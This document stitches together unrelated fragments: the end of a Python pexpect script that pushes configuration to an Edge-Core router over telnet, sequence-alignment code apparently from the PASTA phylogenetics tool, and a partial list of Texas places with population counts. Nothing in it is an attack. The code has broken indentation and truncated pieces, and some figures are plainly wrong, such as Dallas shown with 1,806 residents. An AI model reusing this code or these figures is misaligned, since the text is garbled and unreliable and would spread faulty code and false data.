        child.expect('Password: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["adminpassword"] + "\n")
        child.expect(prom, timeout=timeout)
        # Send the config, skipping blank lines.
        for line in sendlines:
            if (re.match(r"^\s*$", line)):
                continue
            sleep(sleepspan)
            child.send(line + "\n")
            child.expect(prom)  # use pexpect's default 30 s timeout here
        # Leave administrator mode, then close the session.
        sleep(sleepspan)
        child.send('exit' + "\n")
        child.expect(prom + '> ', timeout=timeout)
        sleep(sleepspan)
        child.send('exit' + "\n")
        sleep(sleepspan)
    finally:
        logfp.flush()
        logfp1.close()  # do not close stdout itself
        child.close()
def edgecore_direct_login(routerconfig, sendlines, logfilename):
'''
edgecore_direct_login
Edge-Core にコンフィグ送信し、送信状態をログファイルに記録する関数
ファイルの中身は以下のような内容であるこのを期待している。1行目はJSON、2行目以降は ルータに送信したい内容
"router": "10.0.0.1", "routertype": "edgecore_telnet", "username": "ログインユーザー名", "password": "<PASSWORD>" | |
return ret
def read_file_object(self, file_obj, file_format='FASTA'):
"""Augments the matrix by reading the file object.
If duplicate sequence names are encountered then the old name will be replaced.
"""
if ( file_format.upper() == 'FASTA' ):
read_func = read_fasta
elif ( file_format.upper() == 'NEXUS' ):
read_func = read_nexus
elif ( file_format.upper() == 'PHYLIP' ):
read_func = read_phylip
elif ( file_format.upper() == 'COMPACT3' ):
read_func = read_compact3
else:
raise NotImplementedError("Unknown file format (%s) is not supported" % file_format)
for name, seq in read_func(file_obj):
self[name] = seq
def write_filepath(self, filename, file_format='FASTA', zipout=False):
"""Writes the sequence data in the specified `file_format` to `filename`"""
file_obj = open_with_intermediates(filename,'w')
if zipout:
file_obj.close()
file_obj = StringIO()
self.write(file_obj, file_format=file_format)
if zipout:
import gzip
file_obj_gz = gzip.open(filename, "wb", 6)
file_obj_gz.write(str.encode(file_obj.getvalue()))
file_obj_gz.close()
file_obj.close()
def write(self, file_obj, file_format):
"""Writes the sequence data in the specified `file_format` to `file_obj`"""
if ( file_format.upper() == 'FASTA' ):
write_func = write_fasta
elif ( file_format.upper() == 'NEXUS' ):
write_func = write_nexus
elif ( file_format.upper() == 'PHYLIP' ):
write_func = write_phylip
elif ( file_format.upper() == 'COMPACT' ):
write_func = write_compact
elif ( file_format.upper() == 'COMPACT2' ):
write_func = write_compact2
elif ( file_format.upper() == 'COMPACT3' ):
write_func = write_compact3
else:
write_func = write_fasta
write_func(self, file_obj)
def write_unaligned_fasta(self, filename):
"""Writes the sequence data without gaps as FASTA, but note that the
lines may bet "ragged".
"""
file_obj = open_with_intermediates(filename, 'w')
for name, seq in list(self.items()):
new_seq = re.sub(_INDEL, '', seq)
if new_seq != '':
file_obj.write('>%s\n%s\n' % (name, new_seq))
file_obj.close()
def unaligned(self):
"""
Returns a new alignment with all gaps and missing sequences removed.
"""
new_alignment = Alignment()
new_alignment.datatype = self.datatype
for name, seq in self.items():
new_seq = re.sub(_INDEL, '', str(seq))
if new_seq != '':
new_alignment[name] = new_seq
return new_alignment
def sub_alignment(self, sub_keys):
"Creates an new alignment with a subset of the taxa."
new_alignment = Alignment()
new_alignment.datatype = self.datatype
for key in sub_keys:
if key in self:
new_alignment[key] = self[key]
return new_alignment
def is_empty(self):
return self.__len__() < 1
def is_aligned(self):
if self.is_empty():
raise ValueError("The alignment is empty.\n")
else:
v = list(self.values())
first_seq_len = len(v[0])
return all([len(i) == first_seq_len for i in v])
def partition_info(self, base=0):
return (self.datatype, 1+base, self.sequence_length() + base)
def sequence_length(self):
if self.is_aligned():
return len(list(self.values())[0])
def max_sequence_length(self):
return max(len(re.sub(_INDEL, '', v)) for v in list(self.values()))
def from_bytearray_to_string(self):
for k,v in self.items():
self[k] = str(v)
def from_string_to_bytearray(self):
for k,v in self.items():
self[k] = bytearray(v)
    def mask_gapy_sites(self,minimum_seq_requirement):
        """Remove (mask) every column that has fewer than
        `minimum_seq_requirement` non-gap characters, in place.

        Assumes the alignment is rectangular (all sequences the same length)
        and that '-' is the gap character.
        """
        n = len(list(self.values())[0])
        _LOG.debug("Masking alignment sites with fewer than %d characters from alignment with %d columns" %(minimum_seq_requirement,n))
        # (A previous row-based masking implementation was removed here; the
        # column-based scan below proved more efficient.)
        # Column-based masking: for each column, count non-gap characters until
        # the requirement is met; sequences are pre-sorted by gap count so the
        # densest rows are checked first and the inner loop exits early.
        masked = []
        allseqs = list(self.values())
        allseqs.sort(key=lambda x: x.count("-"))
        for c in range(0,n):
            r = minimum_seq_requirement
            for seq in allseqs:
                if seq[c] != "-":
                    r -= 1
                    if r <= 0:
                        break
            if r > 0:
                masked.append(c)
        _LOG.debug("%d Columns identified for masking" %len(masked))
        if not masked:
            return
        # Turn the masked column indices into the complementary list of kept
        # half-open intervals: each masked column y closes the interval that
        # started just after the previous masked column. The (-1,-1) seed and
        # the z[0]!=z[1] filter drop empty intervals.
        included = [z for z in reduce(lambda x,y: x+[(x[-1][1]+1,y)],masked,[(-1,-1)]) if z[0]!=z[1]]
        if not included:
            included.append((masked[-1]+1,n))
        # Append the tail interval after the last masked column, when non-empty.
        if included[-1][1] < n and masked[-1]+1 != n:
            included.append((masked[-1]+1,n))
        # Rebuild every sequence from the kept slices.
        for k,seq in self.items():
            tmp = []
            for (i,j) in included:
                tmp.append(seq[i:j])
            self[k] = "".join(tmp)
        nn = len(list(self.values())[0])
        # Sanity check: exactly len(masked) columns must have been removed.
        assert (len(masked) == n - nn), "Masking results is not making sense: %d %d %d" %(len(masked), n , nn)
        _LOG.debug("Masking done. Before masking: %d; After masking: %d; minimum requirement: %d;" %(n,nn,minimum_seq_requirement))
    def merge_in(self, she):
        """Merge the sequences of `she` into this alignment.

        Delegates to the module-level `merge_in` helper (the global name, not
        this method, is resolved inside the body).
        """
        merge_in(self,she)
from dendropy.dataio.fastareader import FastaReader
from dendropy import datamodel
from dendropy.datamodel import datasetmodel as dataobject
from dendropy.utility.error import DataParseError
#from dendropy.dataio import fasta
class FastaCustomReader(FastaReader):
    """FASTA reader that can store each sequence as a plain string.

    With ``simple_rows`` enabled (the default) whole sequence rows are
    appended as raw strings and joined once per taxon, instead of being
    converted character-by-character into state objects; symbols are
    validated with a single regular-expression scan per line.  This is
    substantially faster for large alignments.
    """

    def __init__(self, **kwargs):
        FastaReader.__init__(self, **kwargs)
        # Store sequences as joined strings rather than state vectors.
        self.simple_rows = True

    def _read(self, stream, taxon_namespace_factory=None,
              tree_list_factory=None,
              char_matrix_factory=None,
              state_alphabet_factory=None,
              global_annotations_target=None):
        """Parse *stream* as FASTA and return the populated character matrix.

        Raises TypeError when no data type was configured, and
        DataParseError on repeated sequence names, an empty sequence,
        an unrecognized symbol, or sequence data before the first
        ``>`` header line.
        """
        _LOG.debug("Will be using custom Fasta reader")
        taxon_set = taxon_namespace_factory(label=None)
        if self.data_type is None:
            raise TypeError("Data type must be specified for this schema")
        char_matrix = char_matrix_factory(
            self.data_type,
            label=None,
            taxon_namespace=taxon_set)
        symbol_state_map = char_matrix.default_state_alphabet.full_symbol_state_map
        if self.simple_rows:
            # Pre-build one regex matching any character that is NOT a
            # legal alphabet symbol: one search per line replaces a
            # per-character dictionary lookup.
            legal_chars = "".join(sorted(str(x) for x in itertools.chain(
                char_matrix.default_state_alphabet.multistate_symbol_iter(),
                char_matrix.default_state_alphabet.fundamental_symbol_iter())))
            _LOG.debug("Legal characters are: %s" % legal_chars)
            re_illegal = re.compile(r"[^%s]" % legal_chars)
        curr_vec = None
        curr_taxon = None
        for line_index, line in enumerate(stream):
            s = line.strip()
            if not s:
                continue
            if s.startswith('>'):
                # Flush the previous taxon's rows before starting a new one.
                if self.simple_rows and curr_taxon and curr_vec:
                    char_matrix[curr_taxon] = "".join(curr_vec)
                name = s[1:].strip()
                if self.simple_rows:
                    curr_taxon = Taxon(label=name)
                    taxon_set.append(curr_taxon)
                    if curr_taxon in char_matrix:
                        raise DataParseError(message="FASTA error: Repeated sequence name ('{}') found".format(name), line_num=line_index + 1, stream=stream)
                else:
                    # BUGFIX: the original referenced an undefined name
                    # ``taxon_namespace`` here (the parameter is
                    # ``taxon_namespace_factory``), which raised NameError
                    # whenever simple_rows was disabled.  The namespace
                    # created above is ``taxon_set``.
                    curr_taxon = taxon_set.require_taxon(label=name)
                    if curr_taxon in char_matrix:
                        raise DataParseError(message="FASTA error: Repeated sequence name ('{}') found".format(name), line_num=line_index + 1, stream=stream)
                    if curr_vec is not None and len(curr_vec) == 0:
                        raise DataParseError(message="FASTA error: Expected sequence, but found another sequence name ('{}')".format(name), line_num=line_index + 1, stream=stream)
                if self.simple_rows:
                    curr_vec = []
                else:
                    curr_vec = char_matrix[curr_taxon]
            elif curr_vec is None:
                # Grammar fix in the message ("a lines" -> "a line").
                raise DataParseError(message="FASTA error: Expecting a line starting with > before sequences", line_num=line_index + 1, stream=stream)
            elif not self.simple_rows:
                # Slow path: map every character to its state object.
                states = []
                for col_ind, c in enumerate(s):
                    c = c.strip()
                    if not c:
                        continue
                    try:
                        state = symbol_state_map[c]
                    except KeyError:
                        raise DataParseError(message="Unrecognized sequence symbol '{}'".format(c), line_num=line_index + 1, col_num=col_ind + 1, stream=stream)
                    states.append(state)
                curr_vec.extend(states)
            else:
                # Fast path: validate the whole row with one regex search.
                m = re_illegal.search(s)
                if m:
                    raise DataParseError(message='Unrecognized sequence symbol "%s" (check to make sure the --datatype is set properly)' % m.group(0), line_num=line_index + 1, col_num=m.start(), stream=stream)
                curr_vec.append(s)
        # Flush the final taxon's rows.
        if self.simple_rows and curr_taxon and curr_vec:
            char_matrix[curr_taxon] = "".join(curr_vec)
        _LOG.debug("Custom reader finished reading alignment with %d sequences ." % len(char_matrix))
        return char_matrix
class DNACustomFastaReader(FastaCustomReader):
    """Custom FASTA reader preconfigured for DNA data."""

    def __init__(self, **kwargs):
        # Fix the alphabet to DNA; everything else passes through.
        super(DNACustomFastaReader, self).__init__(data_type="dna", **kwargs)
class RNACustomFastaReader(FastaCustomReader):
    """Custom FASTA reader preconfigured for RNA data."""

    def __init__(self, **kwargs):
        # Fix the alphabet to RNA; everything else passes through.
        super(RNACustomFastaReader, self).__init__(data_type="rna", **kwargs)
class ProteinCustomFastaReader(FastaCustomReader):
    """Custom FASTA reader preconfigured for amino-acid (protein) data."""

    def __init__(self, **kwargs):
        # Fix the alphabet to protein; everything else passes through.
        super(ProteinCustomFastaReader, self).__init__(data_type="protein", **kwargs)
import dendropy
from dendropy.dataio import register_reader
# Replace dendropy's stock FASTA readers with the custom implementations
# defined above, one registration per schema name.
register_reader("fasta", FastaCustomReader)
register_reader("dnafasta", DNACustomFastaReader)
register_reader("rnafasta", RNACustomFastaReader)
register_reader("proteinfasta", ProteinCustomFastaReader)
class SequenceDataset(object):
"""Class for creating a dendropy reader, validating the input, and
keeping mapping of real taxa names to "safe" versions that will not
cause problems for our alignment and tree tools.
The general order of calls should be:
############################################################################
# Initialization
############################################################################
sd = SequenceDataset()
sd.read(file_obj, file_format='FASTA', datatype=datatype)
############################################################################
# Check matrix
############################################################################
assert sd.sequences_are_valid(remap_missing, map_missing_to)
############################################################################
# read trees before changing taxa names
############################################################################
tree_list = sd.dataset.read_trees(tree_f, 'NEWICK', encode_splits=True)
############################################################################
# Go to safe labels
############################################################################
md = MultiLocusDataset([sd])
md.relabel_for_pasta()
############################################################################
# use the dataset object
############################################################################
job = PastaJob(multilocus_dataset=md,
pasta_team=pasta_team,
name=options.jobname,
dataset=sd.dataset
)
job.tree = tree_list[0]
job.run(tmp_dir_par=temporaries_dir)
############################################################################
# restore the original names to change the dataset object held by the job
############################################################################
sd.restore_taxon_names()
############################################################################
# get the tree with the original labels
############################################################################
tree_str = job.tree.as_newick_str()
"""
def __init__(self):
    """Create an empty wrapper; populate it later via ``read()``."""
    # No alignment has been read yet.
    self.dataset = None
    self.alphabet = None
    self.datatype = None
    self.filename = '<unknown>'
    # Maps sanitized ("safe") taxon labels back to the original names.
    self.safe_to_real_names = {}
def get_character_matrix(self):
    """Return the first character matrix of the dataset.

    Raises IndexError when no characters have been read.
    """
    matrices = self.dataset.char_matrices
    return matrices[0]
character_matrix = property(get_character_matrix)
def get_taxa_block(self):
    """Return the first taxa block of the underlying dataset."""
    # The attribute name is configured by the module-level
    # DATASET_TAXA_ATTR constant (defined elsewhere in this file).
    taxa_blocks = getattr(self.dataset, DATASET_TAXA_ATTR)
    return taxa_blocks[0]
taxa = property(get_taxa_block)
def read(self, file_obj, file_format='FASTA', datatype=None, filename='<unknown>', careful_parse=False):
"""If the datatype is fasta (or some other type that does not
specify the type of data, then the datatype arg should be DNA, RNA
or 'PROTEIN'
"""
_LOG.debug("using read function from SequenceDataset class with careful_parse = %s" %careful_parse)
self.filename = filename
fup = file_format.upper()
amibig_formats = ['FASTA']
if fup in amibig_formats:
if not datatype:
raise ValueError('datatype must be specified when the file_format is %s' % fup)
dup = datatype.upper()
datatype_list = ['DNA', 'RNA', 'PROTEIN']
if not dup in datatype_list:
raise ValueError('Expecting the datatype to be DNA, RNA or PROTEIN')
file_format = dup + file_format
try:
self.dataset = dendropy.DataSet()
if careful_parse:
self.dataset.read(file=file_obj, schema=file_format)
else:
#self.dataset.read(file_obj, schema=file_format, row_type='str')
self.dataset.read(file=file_obj, schema=file_format)
# | |
city, Texas",8193),
("Alba town, Texas",774),
("Albany city, Texas",1840),
("Aldine CDP, Texas",15822),
("Aledo city, Texas",3817),
("Alfred CDP, Texas",0),
("Alice city, Texas",19146),
("Alice Acres CDP, Texas",188),
("Allen city, Texas",99255),
("Alma town, Texas",359),
("Alpine city, Texas",5992),
("Alto town, Texas",1242),
("Alto Bonito Heights CDP, Texas",194),
("Alton city, Texas",16566),
("Alvarado city, Texas",4044),
("Alvin city, Texas",26154),
("Alvord town, Texas",1165),
("Amada Acres CDP, Texas",0),
("Amargosa CDP, Texas",100),
("Amarillo city, Texas",198773),
("Amaya CDP, Texas",42),
("Ames city, Texas",1247),
("Amherst city, Texas",796),
("Amistad CDP, Texas",23),
("Anacua CDP, Texas",8),
("Anahuac city, Texas",2327),
("Anderson city, Texas",223),
("Andrews city, Texas",13525),
("Angleton city, Texas",19410),
("Angus city, Texas",515),
("Anna city, Texas",12271),
("Annetta town, Texas",3014),
("Annetta North town, Texas",598),
("Annetta South town, Texas",534),
("Annona town, Texas",358),
("Anson city, Texas",2076),
("Anthony town, Texas",5578),
("Anton city, Texas",1123),
("Appleby city, Texas",588),
("Aquilla city, Texas",148),
("Aransas Pass city, Texas",8113),
("Archer City city, Texas",1772),
("Arcola city, Texas",2221),
("Argyle city, Texas",3988),
("Arlington city, Texas",392462),
("Arp city, Texas",941),
("Arroyo Colorado Estates CDP, Texas",567),
("Arroyo Gardens CDP, Texas",108),
("Asherton city, Texas",832),
("Aspermont town, Texas",908),
("Atascocita CDP, Texas",79019),
("Athens city, Texas",12677),
("Atlanta city, Texas",5523),
("Aubrey city, Texas",3313),
("Aurora city, Texas",1498),
("Austin city, Texas",935755),
("Austwell city, Texas",120),
("Avery town, Texas",518),
("Avinger town, Texas",251),
("Azle city, Texas",12149),
("Bacliff CDP, Texas",10649),
("Bailey city, Texas",260),
("Bailey's Prairie village, Texas",759),
("Baird city, Texas",1720),
("Balch Springs city, Texas",25312),
("Balcones Heights city, Texas",3185),
("Ballinger city, Texas",3669),
("Balmorhea city, Texas",609),
("B and E CDP, Texas",422),
("Bandera city, Texas",805),
("Bangs city, Texas",1470),
("Banquete CDP, Texas",389),
("Bardwell city, Texas",623),
("Barrera CDP, Texas",83),
("Barrett CDP, Texas",3691),
("Barry city, Texas",261),
("Barstow city, Texas",522),
("Bartlett city, Texas",2002),
("Barton Creek CDP, Texas",2928),
("Bartonville town, Texas",1839),
("Bastrop city, Texas",8736),
("Batesville CDP, Texas",1274),
("Bay City city, Texas",17681),
("Bayou Vista city, Texas",1658),
("Bayside town, Texas",417),
("Baytown city, Texas",76581),
("Bayview town, Texas",417),
("Beach City city, Texas",2620),
("Bear Creek village, Texas",390),
("Beasley city, Texas",606),
("Beaumont city, Texas",118632),
("Beckville city, Texas",928),
("Bedford city, Texas",49306),
("Bedias city, Texas",334),
("Bee Cave city, Texas",6521),
("Beeville city, Texas",13044),
("Bellaire city, Texas",18733),
("Bellevue city, Texas",360),
("Bellmead city, Texas",10431),
("Bells town, Texas",1385),
("Bellville city, Texas",4234),
("Belton city, Texas",21123),
("Benavides city, Texas",1840),
("Benbrook city, Texas",22961),
("Benjamin city, Texas",200),
("<NAME> CDP, Texas",161),
("Berryville town, Texas",1203),
("Bertram city, Texas",1731),
("Beverly Hills city, Texas",2398),
("Bevil Oaks city, Texas",1283),
("Bigfoot CDP, Texas",286),
("Big Lake city, Texas",3324),
("Big Sandy town, Texas",1747),
("Big Spring city, Texas",28367),
("Big Thicket Lake Estates CDP, Texas",582),
("Big Wells city, Texas",850),
("Bishop city, Texas",3112),
("Bishop Hills town, Texas",297),
("Bixby CDP, Texas",471),
("Blackwell city, Texas",231),
("Blanco city, Texas",2550),
("Blanket town, Texas",346),
("Blessing CDP, Texas",660),
("Bloomburg town, Texas",562),
("Blooming Grove town, Texas",704),
("Bloomington CDP, Texas",1855),
("Blossom city, Texas",1505),
("Blue Berry Hill CDP, Texas",625),
("Blue Mound city, Texas",3398),
("Blue Ridge city, Texas",1012),
("Bluetown CDP, Texas",482),
("Blum town, Texas",373),
("Boerne city, Texas",14799),
("Bogata city, Texas",1190),
("Boling CDP, Texas",916),
("Bolivar Peninsula CDP, Texas",2333),
("Bonanza Hills CDP, Texas",127),
("Bonham city, Texas",10106),
("Bonney village, Texas",246),
("Booker town, Texas",1401),
("Borger city, Texas",12856),
("Botines CDP, Texas",22),
("Bovina city, Texas",1439),
("Bowie city, Texas",5059),
("Box Canyon CDP, Texas",43),
("Boyd town, Texas",1360),
("Boys Ranch CDP, Texas",509),
("Brackettville city, Texas",1831),
("Brady city, Texas",5371),
("Brazoria city, Texas",3094),
("Brazos Bend city, Texas",382),
("Brazos Country city, Texas",577),
("Breckenridge city, Texas",5479),
("Bremond city, Texas",875),
("Brenham city, Texas",16778),
("Briar CDP, Texas",4685),
("Briarcliff village, Texas",1576),
("Briaroaks city, Texas",563),
("Bridge City city, Texas",8004),
("Bridgeport city, Texas",6406),
("Bristol CDP, Texas",484),
("Broaddus town, Texas",269),
("Bronte town, Texas",945),
("Brookshire city, Texas",5199),
("Brookside Village city, Texas",1814),
("Browndell city, Texas",304),
("Brownfield city, Texas",9596),
("Brownsboro city, Texas",1165),
("Brownsville city, Texas",182679),
("Brownwood city, Texas",18820),
("Bruceville-Eddy city, Texas",1509),
("Brundage CDP, Texas",0),
("Bruni CDP, Texas",294),
("Brushy Creek CDP, Texas",20024),
("Bryan city, Texas",83199),
("Bryson city, Texas",551),
("Buchanan Dam CDP, Texas",1466),
("Buchanan Lake Village CDP, Texas",856),
("Buckholts town, Texas",435),
("Buda city, Texas",14503),
("Buena Vista CDP, Texas",54),
("Buffalo city, Texas",1949),
("Buffalo Gap town, Texas",545),
("Buffalo Springs village, Texas",488),
("Bullard town, Texas",3039),
("Bulverde city, Texas",5104),
("Buna CDP, Texas",1891),
("Bunker Hill Village city, Texas",3966),
("Burkburnett city, Texas",11170),
("Burke city, Texas",800),
("Burleson city, Texas",44629),
("Burnet city, Texas",6216),
("Burton city, Texas",560),
("Butterfield CDP, Texas",4),
("Byers city, Texas",517),
("Bynum town, Texas",284),
("Cactus city, Texas",3205),
("Caddo Mills city, Texas",1731),
("Caldwell city, Texas",4302),
("Callender Lake CDP, Texas",1300),
("Callisburg city, Texas",391),
("Calvert city, Texas",1249),
("Camargito CDP, Texas",447),
("Cameron city, Texas",5455),
("Cameron Park CDP, Texas",6226),
("Campbell city, Texas",738),
("Campo Verde CDP, Texas",105),
("Camp Swift CDP, Texas",6553),
("Camp Wood city, Texas",1041),
("Canadian city, Texas",3138),
("Caney City town, Texas",134),
("Canton city, Texas",3757),
("Cantu Addition CDP, Texas",116),
("Canutillo CDP, Texas",5061),
("Canyon city, Texas",15182),
("Canyon Creek CDP, Texas",1306),
("Canyon Lake CDP, Texas",25104),
("Cape Royale CDP, Texas",445),
("Carbon town, Texas",296),
("Carlsbad CDP, Texas",574),
("Carl's Corner town, Texas",180),
("Carmine city, Texas",177),
("Carrizo Hill CDP, Texas",965),
("Carrizo Springs city, Texas",5676),
("Carrollton city, Texas",133438),
("Carthage city, Texas",6646),
("Casa Blanca CDP, Texas",0),
("Casas CDP, Texas",27),
("Cashion Community city, Texas",274),
("Castle Hills city, Texas",4422),
("Castroville city, Texas",2970),
("Catarina CDP, Texas",162),
("Cedar Hill city, Texas",48704),
("Cedar Park city, Texas",72415),
("Cedar Point CDP, Texas",806),
("Celeste city, Texas",873),
("Celina city, Texas",9354),
("Center city, Texas",5319),
("Centerville city, Texas",1092),
("Central Gardens CDP, Texas",4197),
("<NAME> CDP, Texas",1374),
("Chandler city, Texas",2959),
("Channelview CDP, Texas",41930),
("Channing city, Texas",265),
("Chaparrito CDP, Texas",71),
("Chapeno CDP, Texas",23),
("Charlotte city, Texas",1605),
("Chester town, Texas",333),
("Chico city, Texas",1282),
("Childress city, Texas",6203),
("Chillicothe city, Texas",764),
("Chilton CDP, Texas",736),
("China city, Texas",979),
("China Grove town, Texas",1241),
("China Spring CDP, Texas",990),
("Chireno city, Texas",446),
("Christine town, Texas",300),
("Christoval CDP, Texas",401),
("Chula Vista CDP (Cameron County), Texas",499),
("Chula Vista CDP (Maverick County), Texas",3922),
("Chula Vista CDP (Zavala County), Texas",1126),
("Cibolo city, Texas",27963),
("Cienegas Terrace CDP, Texas",3489),
("Cinco Ranch CDP, Texas",16977),
("Circle D-KC Estates CDP, Texas",2674),
("Cisco city, Texas",3766),
("Citrus City CDP, Texas",3275),
("Clarendon city, Texas",1961),
("Clarksville city, Texas",3198),
("Clarksville City city, Texas",744),
("Claude city, Texas",1274),
("Clear Lake Shores city, Texas",1140),
("Cleburne city, Texas",29878),
("Cleveland city, Texas",7998),
("Clifton city, Texas",3369),
("Clint town, Texas",718),
("Cloverleaf CDP, Texas",24953),
("Clute city, Texas",11524),
("Clyde city, Texas",3801),
("Coahoma town, Texas",819),
("Cockrell Hill city, Texas",4268),
("Coffee City town, Texas",264),
("Coldspring city, Texas",984),
("Coleman city, Texas",4398),
("College Station city, Texas",110782),
("Colleyville city, Texas",26037),
("Collinsville town, Texas",1653),
("Colmesneil city, Texas",631),
("Colorado Acres CDP, Texas",118),
("Colorado City city, Texas",3983),
("Columbus city, Texas",3612),
("Comanche city, Texas",4194),
("Combes town, Texas",3031),
("Combine city, Texas",1832),
("Comfort CDP, Texas",3350),
("Commerce city, Texas",9000),
("Como town, Texas",797),
("Concepcion CDP, Texas",46),
("Conroe city, Texas",80893),
("Converse city, Texas",26246),
("Cool city, Texas",180),
("Coolidge town, Texas",846),
("Cooper city, Texas",2213),
("Coppell city, Texas",41512),
("Copperas Cove city, Texas",32731),
("Copper Canyon town, Texas",1235),
("Corinth city, Texas",21158),
("Corpus Christi city, Texas",324692),
("Corral City town, Texas",6),
("Corrigan town, Texas",1794),
("Corsicana city, Texas",23736),
("Cottonwood city, Texas",222),
("Cottonwood Shores city, Texas",1524),
("Cotulla city, Texas",4162),
("Country Acres CDP, Texas",223),
("Coupland city, Texas",255),
("Cove city, Texas",365),
("Covington city, Texas",255),
("Coyanosa CDP, Texas",209),
("Coyote Acres CDP, Texas",1297),
("Coyote Flats city, Texas",342),
("Crandall city, Texas",3491),
("Crane city, Texas",4051),
("Cranfills Gap city, Texas",368),
("Crawford town, Texas",732),
("Creedmoor city, Texas",185),
("Cresson city, Texas",864),
("Crockett city, Texas",6534),
("Crosby CDP, Texas",2542),
("Crosbyton city, Texas",1781),
("Cross Mountain CDP, Texas",3798),
("Cross Plains town, Texas",1101),
("Cross Roads town, Texas",1202),
("Cross Timber town, Texas",356),
("Crowell city, Texas",799),
("Crowley city, Texas",15189),
("Crystal City city, Texas",7381),
("Cuero city, Texas",8349),
("Cuevitas CDP, Texas",0),
("Cumby city, Texas",712),
("Cumings CDP, Texas",2420),
("Cuney town, Texas",46),
("Cushing city, Texas",527),
("Cut and Shoot city, Texas",1313),
("Daingerfield city, Texas",2777),
("Daisetta city, Texas",698),
("Dalhart city, Texas",8545),
("Dallas city, Texas",1806),
("Dalworthington Gardens city, Texas",2456),
("Damon CDP, Texas",269),
("Danbury city, Texas",1391),
("Darrouzett town, Texas",430),
("Dawson town, Texas",900),
("Dayton city, Texas",7881),
("Dayton Lakes city, Texas",108),
("Dean city, Texas",490),
("Decatur city, Texas",6608),
("DeCordova city, Texas",2860),
("Deer Park city, Texas",33935),
("De Kalb city, Texas",1700),
("De Leon city, Texas",2470),
("Dell City city, Texas",216),
("Del Mar Heights CDP, Texas",119),
("Delmita CDP, Texas",129),
("Del Rio city, Texas",35921),
("Del Sol CDP, Texas",59),
("Denison city, Texas",23820),
("Denton city, Texas",133661),
("Denver City town, Texas",4874),
("Deport city, Texas",669),
("DeSoto city, Texas",53030),
("Detroit town, Texas",921),
("Devers city, Texas",434),
("Devine city, Texas",4721),
("Deweyville CDP, Texas",637),
("D'Hanis CDP, Texas",918),
("Diboll city, Texas",5308),
("Dickens city, Texas",276),
("Dickinson city, Texas",20529),
("Dilley city, Texas",4318),
("Dimmitt city, Texas",4251),
("DISH town, Texas",419),
("Dodd City town, Texas",337),
("Dodson town, Texas",158),
("Doffing CDP, Texas",5065),
("Domino town, Texas",107),
("Donna city, Texas",16576),
("Doolittle CDP, Texas",3531),
("Dorchester city, Texas",77),
("Double Oak town, Texas",3065),
("Douglassville town, Texas",237),
("Driftwood CDP, Texas",74),
("Dripping Springs city, Texas",3277),
("Driscoll city, Texas",612),
("Dublin city, Texas",3589),
("Dumas city, Texas",14597),
("Duncanville city, Texas",39630),
("Eagle Lake city, Texas",3685),
("Eagle Pass city, Texas",29151),
("Early city, Texas",2923),
("Earth city, Texas",1099),
("East Alto Bonito CDP, Texas",819),
("East Bernard city, Texas",2668),
("Eastland city, Texas",3893),
("East Mountain city, Texas",1311),
("Easton city, Texas",373),
("East Tawakoni city, Texas",729),
("Ector city, Texas",903),
("Edcouch city, Texas",3316),
("Eden city, Texas",2511),
("Edgecliff Village town, Texas",3002),
("Edgewater Estates CDP, Texas",122),
("Edgewood town, Texas",1876),
("Edinburg city, Texas",94019),
("Edmonson town, Texas",76),
("Edna city, Texas",5784),
("Edom city, Texas",245),
("Edroy CDP, Texas",523),
("Eidson Road CDP, Texas",9531),
("Elbert CDP, Texas",8),
("El Brazil CDP, Texas",61),
("El Camino Angosto CDP, Texas",173),
("El Campo city, Texas",11670),
("El Castillo CDP, Texas",137),
("El Cenizo CDP, Texas",444),
("El Cenizo city, Texas",3248),
("El Chaparral CDP, Texas",375),
("Eldorado city, Texas",2348),
("Electra city, Texas",2721),
("Elgin city, Texas",9616),
("Elias-Fela Solis CDP, Texas",8),
("El Indio CDP, Texas",23),
("Elkhart town, Texas",1399),
("El Lago city, Texas",2760),
("Elm Creek CDP, Texas",2730),
("Elmendorf city, Texas",2077),
("El Mesquite CDP, Texas",0),
("Elmo CDP, Texas",1351),
("E. Lopez CDP, Texas",210),
("El Paso city, Texas",680354),
("El Quiote CDP, Texas",193),
("El Rancho Vela CDP, Texas",569),
("El Refugio CDP, Texas",372),
("Elsa city, Texas",7142),
("El Socio CDP, Texas",69),
("Emerald Bay CDP, Texas",1307),
("Emhouse town, Texas",162),
("Emory city, Texas",1361),
("Encantada-Ranchito-El Calaboz CDP, Texas",1438),
("Enchanted Oaks town, Texas",316),
("Encinal city, Texas",953),
("Encino CDP, Texas",44),
("Ennis city, Texas",19196),
("Escobares city, Texas",2529),
("Estelline town, Texas",100),
("Eugenio Saenz CDP, Texas",260),
("Euless city, Texas",55047),
("Eureka city, Texas",342),
("Eustace city, Texas",912),
("Evadale CDP, Texas",1887),
("Evant town, Texas",493),
("Evergreen CDP, Texas",53),
("Everman city, Texas",6252),
("Fabens CDP, Texas",5946),
("Fabrica CDP, Texas",748),
("Fairchilds village, Texas",854),
("Fairfield city, Texas",2922),
("Fair Oaks Ranch city, Texas",10857),
("Fairview town, Texas",8665),
("Falconaire CDP, Texas",180),
("Falcon Heights CDP, Texas",22),
("Falcon Lake Estates CDP, Texas",995),
("Falcon Mesa CDP, Texas",248),
("Falcon Village CDP, Texas",0),
("Falfurrias city, Texas",4644),
("Falls City city, Texas",935),
("Falman CDP, Texas",15),
("Fannett CDP, Texas",2156),
("Farmers Branch city, Texas",35552),
("Farmersville city, Texas",3469),
("Farwell city, Texas",1388),
("Fate city, Texas",11705),
("Fayetteville city, Texas",204),
("Faysville CDP, Texas",0),
("<NAME> CDP, Texas",27),
("Ferris city, Texas",2612),
("Fifth Street CDP, Texas",2047),
("Flatonia town, Texas",1556),
("Flor del Rio CDP, Texas",254),
("Florence city, Texas",981),
("Floresville city, Texas",7377),
("Flowella CDP, Texas",21),
("Flower Mound town, Texas",73252),
("Floydada city, Texas",2767),
("Follett city, Texas",479),
("Forest Hill city, Texas",12913),
("Forney city, Texas",19366),
("Forsan city, Texas",224),
("Fort Bliss CDP, Texas",10602),
("Fort Clark Springs CDP, Texas",1189),
("Fort Davis CDP, Texas",1029),
("Fort Hancock CDP, Texas",1898),
("Fort Hood CDP, Texas",25365),
("Fort Stockton city, Texas",8414),
("Fort Worth city, Texas",855786),
("Four Corners CDP, Texas",12465),
("Four Points CDP, Texas",0),
("Fowlerton CDP, Texas",314),
("Franklin city, Texas",1976),
("Frankston town, Texas",1053),
("Fredericksburg city, Texas",11157),
("Freeport city, Texas",12098),
("Freer city, Texas",2714),
("Fresno CDP, Texas",24607),
("Friendswood city, Texas",39319),
("Friona city, Texas",3936),
("Frisco city, Texas",165700),
